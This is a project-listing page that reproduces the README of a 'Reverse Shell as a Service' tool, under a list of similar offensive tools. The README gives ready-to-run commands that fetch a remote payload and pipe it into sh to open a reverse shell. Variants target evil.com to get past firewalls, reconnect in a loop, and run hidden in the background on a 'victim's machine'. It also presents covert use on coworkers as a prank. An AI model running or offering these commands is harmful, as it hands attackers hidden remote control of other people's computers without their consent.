GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → lukechilds → Reverse Shell

lukechilds / Reverse Shell

Licence: mit
Reverse Shell as a Service

Programming Languages

javascript
184084 projects - #8 most used programming language

Labels

microservicepentestingexploitvulnerabilityreverse-shell

Projects that are alternatives of or similar to Reverse Shell

Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-93.21%)
Mutual labels:  pentesting, exploit, vulnerability, reverse-shell
V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (-33.88%)
Mutual labels:  pentesting, exploit, vulnerability
rsGen
rsGen is a Reverse Shell Payload Generator for hacking.
Stars: ✭ 71 (-94.46%)
Mutual labels:  reverse-shell, exploit, vulnerability
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (-97.27%)
Mutual labels:  reverse-shell, exploit, pentesting
Ansvif
A Not So Very Intelligent Fuzzer: An advanced fuzzing framework designed to find vulnerabilities in C/C++ code.
Stars: ✭ 107 (-91.65%)
Mutual labels:  pentesting, exploit, vulnerability
A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-70.18%)
Mutual labels:  pentesting, exploit, vulnerability
Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (-63%)
Mutual labels:  pentesting, exploit
Hack Tools
hack tools
Stars: ✭ 488 (-61.9%)
Mutual labels:  exploit, vulnerability
Herpaderping
Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.
Stars: ✭ 614 (-52.07%)
Mutual labels:  exploit, vulnerability
Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+275.33%)
Mutual labels:  exploit, vulnerability
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+425.92%)
Mutual labels:  pentesting, reverse-shell
Pwncat
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Stars: ✭ 904 (-29.43%)
Mutual labels:  pentesting, reverse-shell
Poc
Proofs-of-concept
Stars: ✭ 467 (-63.54%)
Mutual labels:  exploit, vulnerability
Hershell
Multiplatform reverse shell generator
Stars: ✭ 456 (-64.4%)
Mutual labels:  exploit, reverse-shell
Platypus
🔨 A modern multiple reverse shell sessions manager wrote in go
Stars: ✭ 559 (-56.36%)
Mutual labels:  pentesting, reverse-shell
Covertutils
A framework for Backdoor development!
Stars: ✭ 424 (-66.9%)
Mutual labels:  pentesting, reverse-shell
Slowloris
Asynchronous Python implementation of SlowLoris DoS attack
Stars: ✭ 51 (-96.02%)
Mutual labels:  exploit, vulnerability
Labs
Vulnerability Labs for security analysis
Stars: ✭ 1,002 (-21.78%)
Mutual labels:  exploit, vulnerability
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (-15.77%)
Mutual labels:  pentesting, exploit
Javadeserh2hc
Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
Stars: ✭ 361 (-71.82%)
Mutual labels:  vulnerability, reverse-shell
View All Similar Projects ➔

reverse-shell

Reverse Shell as a Service - https://reverse-shell.sh

Build Status Coverage Status npm

Easy to remember reverse shell that should work on most Unix-like systems.

Detects available software on the target and runs an appropriate payload.

Usage

1. Listen for connection

On your machine, open up a port and listen on it. You can do this easily with netcat.

nc -l 1337

2. Execute reverse shell on target

On the target machine, pipe the output of https://reverse-shell.sh/yourip:port into sh.

curl https://reverse-shell.sh/192.168.0.69:1337 | sh

Go back to your machine, you should now have a shell prompt.

3. Don't be a dick

This is meant to be used for pentesting or helping coworkers understand why they should always lock their computers. Please don't use this for anything malicious.

Demo

Tips

Hostname

You can use a hostname instead of an IP.

curl https://reverse-shell.sh/localhost:1337 | sh

Remote connections

Because this is a reverse connection it can punch through firewalls and connect to the internet.

You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:

curl https://reverse-shell.sh/evil.com:1337 | sh

Reconnecting

By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done

Be careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack.

Running as a background process

The terminal session needs to be kept open to persist the reverse shell connection. That might be a bit of a giveaway if you're trying to prank coworkers.

The following command will run the reverse shell in a background process and exit the terminal, leaving no suspicious looking terminal windows open on the victim's machine.

Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit

License

MIT © Luke Childs

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].